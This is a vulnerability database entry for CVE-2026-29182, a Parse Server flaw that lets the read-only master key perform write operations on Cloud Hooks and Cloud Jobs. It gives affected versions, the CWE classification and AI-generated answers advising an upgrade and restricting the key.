CVE-2026-29182
Received Received - Intake
Privilege Escalation via readOnlyMasterKey in Parse Server

Publication date: 2026-03-06

Last updated on: 2026-03-10

Assigner: GitHub, Inc.

Description
Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.4 and 9.4.1-alpha.3, Parse Server's readOnlyMasterKey option allows access with master-level read privileges but is documented to deny all write operations. However, some endpoints incorrectly accept the readOnlyMasterKey for mutating operations. This allows a caller who only holds the readOnlyMasterKey to create, modify, and delete Cloud Hooks and to start Cloud Jobs, which can be used for data exfiltration. Any Parse Server deployment that uses the readOnlyMasterKey option is affected. Note than an attacker needs to know the readOnlyMasterKey to exploit this vulnerability. This issue has been patched in versions 8.6.4 and 9.4.1-alpha.3.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-03-06
Last Modified
2026-03-10
Generated
2026-05-07
AI Q&A
2026-03-06
EPSS Evaluated
2026-05-05
NVD
CVE-2026-29182
EUVD
EUVD-2026-10058
Affected Vendors & Products
Showing 4 associated CPEs
Vendor Product Version / Range
parseplatform parse-server to 8.6.4 (exc)
parseplatform parse-server 9.4.1
parseplatform parse-server 9.4.1
parseplatform parse-server From 9.0.0 (inc) to 9.4.0 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-863 The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.
Attack-Flow Graph
AI Powered Q&A
How can this vulnerability be detected on my network or system? Can you suggest some commands?

I don't know


What immediate steps should I take to mitigate this vulnerability?

To mitigate this vulnerability, the primary and recommended step is to upgrade Parse Server to version 8.6.4 or 9.4.1-alpha.3 or later, where the issue has been fixed.

If an immediate upgrade is not possible, restrict access to the readOnlyMasterKey and avoid sharing it with untrusted parties to reduce the risk of exploitation.


Can you explain this vulnerability to me?

CVE-2026-29182 is a vulnerability in Parse Server versions prior to 8.6.4 and 9.4.1-alpha.3 where the readOnlyMasterKey, which is supposed to allow only master-level read access and deny all write operations, is improperly enforced.

Due to this flaw, some endpoints incorrectly accept the readOnlyMasterKey for mutating operations, allowing an attacker who knows this key to create, modify, and delete Cloud Hooks and start Cloud Jobs.

This can be exploited to perform unauthorized write actions, potentially leading to data exfiltration.

The issue was fixed in versions 8.6.4 and 9.4.1-alpha.3 by adding proper authorization checks.


How can this vulnerability impact me? :

If you use Parse Server with the readOnlyMasterKey option, this vulnerability allows an attacker who knows the readOnlyMasterKey to perform unauthorized write operations.

  • Create, modify, and delete Cloud Hooks.
  • Start Cloud Jobs.

These actions can be used for data exfiltration and compromise the confidentiality, integrity, and availability of your system.

The vulnerability has a high severity rating with a CVSS v4 base score of 8.6 and can be exploited remotely without user interaction, but requires possession of the readOnlyMasterKey.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

I don't know


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart